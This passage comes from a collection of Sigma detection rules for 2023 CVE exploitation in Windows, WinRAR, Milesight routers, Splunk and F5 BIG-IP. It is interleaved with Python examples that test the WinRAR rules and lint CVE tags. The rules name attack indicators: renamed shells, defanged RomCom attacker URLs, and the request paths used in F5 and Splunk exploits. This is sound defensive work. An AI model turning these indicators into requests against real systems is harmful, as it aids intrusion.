    "content": "title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation\nid: ad0960eb-0015-4d16-be13-b3d9f18f1342\nstatus: test\ndescription: Detects the creation of a file named \"wermgr.exe\" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.\nreferences:\n    - https://github.com/Wh04m1001/CVE-2023-36874\n    - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-23\nmodified: 2025-01-13\ntags:\n    - attack.execution\n    - cve.2023-36874\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\wermgr.exe'\n    filter_main_locations:\n        TargetFilename|contains:\n            - ':\\$WINDOWS.~BT\\NewOS\\'\n            - ':\\$WinREAgent\\' # From \"wuauclt.exe\"\n            - ':\\Windows\\servicing\\LCU\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n            - ':\\WUDownloadCache\\' # Windows Update Download Cache\n            - ':\\Windows\\SoftwareDistribution\\Download\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml",
    "content": "title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution\nid: 50dbc08b-60ce-40f1-a6b6-346497e34c88\nstatus: test\ndescription: Detects the execution of a renamed \"cmd\", \"powershell\" or \"powershell_ise\" binary. Attackers were seen using these binaries in a renamed form as \"wermgr.exe\" in exploitation of CVE-2023-36874\nreferences:\n    - https://github.com/Wh04m1001/CVE-2023-36874\n    - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-23\ntags:\n    - attack.execution\n    - cve.2023-36874\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'Cmd.Exe'\n            - 'powershell_ise.EXE'\n            - 'powershell.exe'\n        Image|endswith: '\\wermgr.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation Dropped File\nid: 8023d3a2-dcdc-44da-8fa9-5c7906e55b38\nstatus: test\ndescription: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\n    - https://twitter.com/wdormann/status/1679184475677130755\n    - https://twitter.com/r00tbsd/status/1679042071477338114/photo/1\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Office\\Recent\\'\n        TargetFilename|endswith: '\\file001.url'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation Pattern\nid: 0066d244-c277-4c3e-88ec-9e7b777cc8bc\nstatus: test\ndescription: Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|contains: '/MSHTML_C7/'\n        c-uri|re: '\\?d=[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce_extenstion_ip_pattern_traffic.yml",
    "content": "title: Potential CVE-2023-36884 URL Request Pattern Traffic\nid: d9365e39-febd-4a4b-8441-3ca91bb9d333\nstatus: test\ndescription: Detects requests for a file with one of a specific set of extensions whose \"d\" parameter carries an IP address. This pattern was seen being used by RomCom potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    # Examples:\n    #   hxxp://74.50[.]94[.]156/MSHTML_C7/zip_k.asp?d=99.99.99.99.\n    #   104.234[.]239[.]26/share1/MSHTML_C7/1/99.99.99.99_a15fa_file001.htm?d=99.99.99.99_ a15fa_\n    selection:\n        cs-method: 'GET'\n        c-uri|re: '\\.(zip|asp|htm|url|xml|chm|mht|vbs|search-ms)\\?d=[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce_traffic.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation - File Downloads\nid: 6af1617f-c179-47e3-bd66-b28034a1052d\nstatus: test\ndescription: Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|contains:\n            - '/ex001.url'\n            - '/file001.search-ms'\n            - '/file001.url'\n            - '/file001.vbs'\n            - '/file1.mht'\n            - '/o2010.asp'\n            - '/redir_obj.html'\n            - '/RFile.asp'\n            - '/zip_k.asp'\n            - '/zip_k2.asp'\n            - '/zip_k3.asp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce_url_marker_traffic.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation - URL Marker\nid: e59f71ff-c042-4f7a-8a82-8f53beea817e\nstatus: test\ndescription: Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|contains: '/MSHTML_C7/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation - Share Access\nid: 3df95076-9e78-4e63-accb-16699c3b74f8\nstatus: test\ndescription: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit File Share\" must be configured for Success/Failure'\ndetection:\n    selection_eid:\n        EventID: 5140\n    selection_share_name:\n        ShareName|contains: '\\MSHTML_C7\\'\n        ShareName|re: '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_share_path:\n        ShareLocalPath|contains: '\\MSHTML_C7\\'\n        ShareLocalPath|re: '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    condition: selection_eid and 1 of selection_share_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml",
    "content": "title: CVE-2023-38831 Exploitation Attempt - Suspicious Double Extension File\nid: e4556676-fc5c-4e95-8c39-5ef27791541f\nrelated:\n    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343\n      type: similar\nstatus: test\ndescription: Detects the creation of a file by WinRAR in its temporary extraction directory whose name contains a short extension followed by a space and a second extension. This could be a sign of exploitation of CVE-2023-38831\nreferences:\n    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-30\ntags:\n    - attack.execution\n    - cve.2023-38831\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\WinRAR.exe'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\Rar$'\n        TargetFilename|re: '\\.[a-zA-Z0-9]{1,4} \\.'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml",
    "content": "title: CVE-2023-38831 Exploitation Attempt - Suspicious WinRAR Child Process\nid: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343\nrelated:\n    - id: e4556676-fc5c-4e95-8c39-5ef27791541f\n      type: similar\nstatus: test\ndescription: Detects an exploitation attempt of CVE-2023-38831 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.\nreferences:\n    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nauthor: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)\ndate: 2023-08-30\nmodified: 2024-01-22\ntags:\n    - detection.emerging-threats\n    - attack.execution\n    - attack.t1203\n    - cve.2023-38831\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\WinRAR.exe'\n    selection_folder:\n        CommandLine|contains: '\\AppData\\Local\\Temp\\Rar$'\n    selection_double_ext:\n        CommandLine|re: '\\.[a-zA-Z0-9]{1,4} \\.'\n    selection_binaries:\n        # Note: add additional binaries that the attacker might use\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
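The two rules above key on the naming trick behind CVE-2023-38831 described in the Group-IB reference they cite: the archive holds a decoy document and a folder named like the document plus a trailing space, which contains a script named the same way (for example "invoice.pdf .cmd"); affected WinRAR versions extract the folder contents next to the decoy and launch the script instead of the document. The Python below is an added example, not part of either rule or of the SigmaHQ repository; it re-expresses both selections and runs them over constructed Sysmon-style file and process events (the user name, temporary directory name, binary paths and command lines are made up for the example).

```python
import re

# The two rules' constraints re-expressed in Python. Sigma string comparisons are case-insensitive,
# so paths are lower-cased before matching; the 're' modifier is applied exactly as written in the rules.
RAR_TEMP_MARKER = "\\appdata\\local\\temp\\rar$"        # TargetFilename/CommandLine|contains '\AppData\Local\Temp\Rar$'
DOUBLE_EXT_RE = re.compile(r"\.[a-zA-Z0-9]{1,4} \.")     # TargetFilename/CommandLine|re: '\.[a-zA-Z0-9]{1,4} \.'
SCRIPT_HOSTS_BY_IMAGE = ("\\cmd.exe", "\\cscript.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe")
SCRIPT_HOSTS_BY_ORIGINAL_NAME = ("cmd.exe", "cscript.exe", "powershell.exe", "pwsh.dll", "wscript.exe")


def file_rule_matches(event):
    """file_event rule e4556676: WinRAR writes a 'name.ext .ext2' file into its Rar$ temporary directory."""
    target = event.get("TargetFilename", "")
    return (event.get("Image", "").lower().endswith("\\winrar.exe")
            and RAR_TEMP_MARKER in target.lower()
            and DOUBLE_EXT_RE.search(target) is not None)


def proc_rule_matches(event):
    """process_creation rule ec3a3c2f: a script host spawned by WinRAR with such a path on its command line."""
    cmdline = event.get("CommandLine", "")
    is_script_host = (event.get("Image", "").lower().endswith(SCRIPT_HOSTS_BY_IMAGE)
                      or event.get("OriginalFileName", "").lower() in SCRIPT_HOSTS_BY_ORIGINAL_NAME)
    return (event.get("ParentImage", "").lower().endswith("\\winrar.exe")
            and RAR_TEMP_MARKER in cmdline.lower()
            and DOUBLE_EXT_RE.search(cmdline) is not None
            and is_script_host)


# Constructed Sysmon-style events for one archive opened by the victim (all paths made up for this example).
WINRAR = "C:\\Program Files\\WinRAR\\WinRAR.exe"
TEMP_DIR = "C:\\Users\\alice\\AppData\\Local\\Temp\\Rar$DIa5512.14288\\"
CMD = "C:\\Windows\\System32\\cmd.exe"
ACROBAT = "C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe"

SAMPLE_EVENTS = [
    # 0: the decoy document being extracted (benign on its own)
    {"kind": "file", "Image": WINRAR, "TargetFilename": TEMP_DIR + "invoice.pdf"},
    # 1: the script from the 'invoice.pdf ' folder landing next to the decoy
    {"kind": "file", "Image": WINRAR, "TargetFilename": TEMP_DIR + "invoice.pdf .cmd"},
    # 2: WinRAR launching the script instead of the document
    {"kind": "proc", "ParentImage": WINRAR, "Image": CMD, "OriginalFileName": "Cmd.Exe",
     "CommandLine": f'"{CMD}" /c ""{TEMP_DIR}invoice.pdf .cmd" "'},
    # 3: a normal open of a PDF from an archive: a viewer, no double extension
    {"kind": "proc", "ParentImage": WINRAR, "Image": ACROBAT, "OriginalFileName": "Acrobat.exe",
     "CommandLine": f'"{ACROBAT}" "{TEMP_DIR}invoice.pdf"'},
]


def evaluate(events):
    """Run both rules over the events; returns the indexes that fired, keyed by rule."""
    hits = {"file_rule": [], "proc_rule": []}
    for idx, event in enumerate(events):
        if event["kind"] == "file" and file_rule_matches(event):
            hits["file_rule"].append(idx)
        if event["kind"] == "proc" and proc_rule_matches(event):
            hits["proc_rule"].append(idx)
    return hits


if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))
```

Against these four events the file rule fires only on event 1 and the process rule only on event 2; the decoy extraction and the viewer launch stay quiet because neither carries the "extension, space, dot" sequence the regex requires.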
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml",
    "content": "title: CVE-2023-40477 Potential Exploitation - .REV File Creation\nid: c3bd6c55-d495-4c34-918e-e03e8828c074\nstatus: test\ndescription: Detects the creation of \".rev\" (RAR recovery volume) files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.\nreferences:\n    - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/\n    - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC\n    - https://www.rarlab.com/vuln_rev3_names.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.execution\n    - cve.2023-40477\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\explorer.exe' # When extracted via context menu\n            - '\\WinRAR.exe'\n        TargetFilename|endswith: '.rev'\n    condition: selection\nfalsepositives:\n    - Legitimate handling of multi-volume RAR archives that ship with recovery volumes\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml",
    "content": "title: CVE-2023-40477 Potential Exploitation - WinRAR Application Crash\nid: e5a29b54-6fe7-4258-8a23-82960e31231a\nstatus: test\ndescription: Detects a crash of \"WinRAR.exe\" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477\nreferences:\n    - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/\n    - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC\n    - https://www.rarlab.com/vuln_rev3_names.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.execution\n    - cve.2023-40477\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        AppName: 'WinRAR.exe'\n    filter_main_fixed_version:\n        # TODO: fix this when the \"lt\" modifier is implemented for software versions\n        AppVersion|startswith:\n            - '6.23.'\n            - '6.24.'\n            - '6.25.'\n            - '6.26.'\n            - '7.'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate crash for reasons other than exploitation of the vulnerability\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-43261/proxy_exploit_cve_2023_43261_milesight_information_disclosure.yml",
    "content": "title: Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy\nid: f48f5368-355c-4a1b-8bf5-11c13d589eaa\nrelated:\n    - id: a2bcca38-9f3a-4d5e-b603-0c587e8569d7\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempts of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35 and UR41 routers before v35.3.0.7 that allows attackers to access sensitive router components, in proxy logs.\nreferences:\n    - https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html\n    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf\n    - https://github.com/win3zz/CVE-2023-43261\n    - https://vulncheck.com/blog/real-world-cve-2023-43261\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-10-20\nmodified: 2023-10-30\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-43261\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        # Note: In theory other files can be requested through the same path. But since this log can contain passwords and other interesting information, it is the most likely target during a real attack\n        c-uri|contains: '/lang/log/httpd.log' # Also covers \"httpd.log.old\"\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-43261/web_exploit_cve_2023_43261_milesight_information_disclosure.yml",
    "content": "title: Potential Information Disclosure CVE-2023-43261 Exploitation - Web\nid: a2bcca38-9f3a-4d5e-b603-0c587e8569d7\nrelated:\n    - id: f48f5368-355c-4a1b-8bf5-11c13d589eaa\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempts of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35 and UR41 routers before v35.3.0.7 that allows attackers to access sensitive router components, in access logs.\nreferences:\n    - https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html\n    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf\n    - https://github.com/win3zz/CVE-2023-43261\n    - https://vulncheck.com/blog/real-world-cve-2023-43261\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-10-20\nmodified: 2023-10-30\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-43261\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Requirements: In order for this detection to trigger, access logs of the router must be collected.'\ndetection:\n    selection:\n        cs-method: 'GET'\n        # Note: In theory other files can be requested through the same path. But since this log can contain passwords and other interesting information, it is the most likely target during a real attack\n        cs-uri-stem|contains: '/lang/log/httpd.log' # Also covers \"httpd.log.old\"\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
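A rule's `cve.*` tag has to agree with the CVE identifier named in its title or description, because SIEM dashboards and hunting queries filter on the tag, and a single transposed digit there silently drops the rule from every CVE-based view. The following check is added here as an illustration; it is not part of the SigmaHQ test suite. It deliberately avoids a YAML dependency and reads only the tags list and the free text with regular expressions. The three rule snippets it runs on are constructed for the example (only the fields the check reads are included), and the first one carries a transposed-digit tag on purpose.

```python
import re

# 'CVE-2023-43261' as it appears in titles, descriptions and reference URLs.
CVE_IN_TEXT = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b", re.IGNORECASE)
# '    - cve.2023-43261' as it appears in the tags list (one tag per line).
CVE_TAG = re.compile(r"^\s*-\s*cve\.(\d{4})-(\d{4,})\s*$", re.MULTILINE)


def cve_tag_mismatches(rule_text: str) -> list[str]:
    """Return every cve.* tag whose (year, number) pair is never mentioned in the rule text."""
    mentioned = set(CVE_IN_TEXT.findall(rule_text))  # {('2023', '43261'), ...}
    return [
        f"cve.{year}-{num}"
        for year, num in CVE_TAG.findall(rule_text)
        if (year, num) not in mentioned
    ]


def lint_rules(rules: dict[str, str]) -> dict[str, list[str]]:
    """Map rule path -> findings; only rules with at least one finding are listed."""
    findings: dict[str, list[str]] = {}
    for path, text in rules.items():
        bad = cve_tag_mismatches(text)
        if bad:
            findings[path] = [f"tag {tag} matches no CVE named in the rule" for tag in bad]
    return findings


# Constructed rule snippets for the example; not copied from any repository.
SAMPLE_RULES = {
    "rules/milesight_typo.yml": (
        "title: Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy\n"
        "tags:\n"
        "    - attack.t1190\n"
        "    - cve.2023-43621\n"  # transposed digits: the slip this check exists to catch
        "    - detection.emerging-threats\n"
    ),
    "rules/splunk_ok.yml": (
        "title: Potential CVE-2023-46214 Exploitation Attempt\n"
        "tags:\n"
        "    - attack.t1210\n"
        "    - cve.2023-46214\n"
    ),
    "rules/no_cve_tag.yml": (
        "title: COLDSTEEL RAT Cleanup Command Execution\n"
        "tags:\n"
        "    - attack.persistence\n"
    ),
}

if __name__ == "__main__":
    for path, problems in lint_rules(SAMPLE_RULES).items():
        for problem in problems:
            print(f"{path}: {problem}")
```

Run it as a pre-commit hook or in CI over every `.yml` under `rules*/`; a rule that cites the CVE only in a reference URL still passes, since the URL mentions the identifier in the `CVE-YYYY-NNNN` form the text regex looks for.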
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46214/web_cve_2023_46214_rce_splunk_enterprise.yml",
    "content": "title: Potential CVE-2023-46214 Exploitation Attempt\nid: 04017cd5-621e-4ec4-a762-1f042fe3d3e5\nrelated:\n    - id: ba5268de-4dd4-4d5c-8a90-2b5e6dc1aff8\n      type: derived\nstatus: test\ndescription: |\n    Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing\nreferences:\n    - https://github.com/nathan31337/Splunk-RCE-poc/\n    - https://blog.hrncirik.net/cve-2023-46214-analysis\n    - https://advisory.splunk.com/advisories/SVD-2023-1104\nauthor: Nasreddine Bencherchali (Nextron Systems), Bhavin Patel (STRT)\ndate: 2023-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - cve.2023-46214\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: POST\n        cs-uri-query|contains|all:\n            - 'NO_BINARY_CHECK=1'\n            - 'input.path'\n        cs-uri-query|endswith: '.xsl'\n        sc-status:\n            - 200\n            - 302\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46214/web_cve_2023_46214_rce_splunk_enterprise_poc.yml",
    "content": "title: Exploitation Attempt Of CVE-2023-46214 Using Public POC Code\nid: ba5268de-4dd4-4d5c-8a90-2b5e6dc1aff8\nrelated:\n    - id: 04017cd5-621e-4ec4-a762-1f042fe3d3e5\n      type: derived\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code\nreferences:\n    - https://github.com/nathan31337/Splunk-RCE-poc/\n    - https://blog.hrncirik.net/cve-2023-46214-analysis\n    - https://advisory.splunk.com/advisories/SVD-2023-1104\nauthor: Lars B. P. Frydenskov(Trifork Security)\ndate: 2023-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - cve.2023-46214\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_method_and_response:\n        cs-method: POST\n        sc-status:\n            - 200\n            - 302\n    selection_uri_upload:\n        cs-uri-stem|contains: '/splunkd/__upload/indexing/preview'\n        cs-uri-query|contains|all:\n            - 'NO_BINARY_CHECK=1'\n            - 'input.path=shell.xsl'\n    selection_uri_search:\n        cs-uri-stem|contains|all:\n            - '/api/search/jobs'\n            - '/results'\n        cs-uri-query|contains|all:\n            - '/opt/splunk/var/run/splunk/dispatch/'\n            - '/shell.xsl'\n    condition: selection_method_and_response and 1 of selection_uri_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46747/proxy_cve_2023_46747_f5_remote_code_execution.yml",
    "content": "title: CVE-2023-46747 Exploitation Activity - Proxy\nid: f195b2ff-e542-41bf-8d91-864fb81e5c20\nrelated:\n    - id: e9928831-ba14-42ea-a4bc-33d352b9929a\n      type: similar\nstatus: test\ndescription: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.\nreferences:\n    - https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main\n    - https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml\n    - https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg\n    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-08\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-46747\n    - detection.emerging-threats\nlogsource:\n    category: proxy\n    definition: 'Requirements: The POST request body data must be collected in order to make use of this detection'\ndetection:\n    selection:\n        cs-method: 'POST'\n        c-uri|contains: '/mgmt/tm/util/bash'\n    keywords_hex:\n        '|all':\n            - '2f746d75692f436f6e74726f6c2f666f726d' # /tmui/Control/form\n            - '666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a7370' # form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp\n    keywords_plain:\n        '|all':\n            - '/tmui/Control/form'\n            - 'form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp'\n    condition: selection and (keywords_hex or keywords_plain)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46747/web_cve_2023_46747_f5_remote_code_execution.yml",
    "content": "title: CVE-2023-46747 Exploitation Activity - Webserver\nid: e9928831-ba14-42ea-a4bc-33d352b9929a\nrelated:\n    - id: f195b2ff-e542-41bf-8d91-864fb81e5c20\n      type: similar\nstatus: test\ndescription: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.\nreferences:\n    - https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main\n    - https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml\n    - https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg\n    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-08\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-46747\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Requirements: The POST request body data must be collected in order to make use of this detection'\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-stem|contains: '/mgmt/tm/util/bash'\n    keywords_hex:\n        '|all':\n            - '2f746d75692f436f6e74726f6c2f666f726d' # /tmui/Control/form\n            - '666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a7370' # form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp\n    keywords_plain:\n        '|all':\n            - '/tmui/Control/form'\n            - 'form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp'\n    condition: selection and (keywords_hex or keywords_plain)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
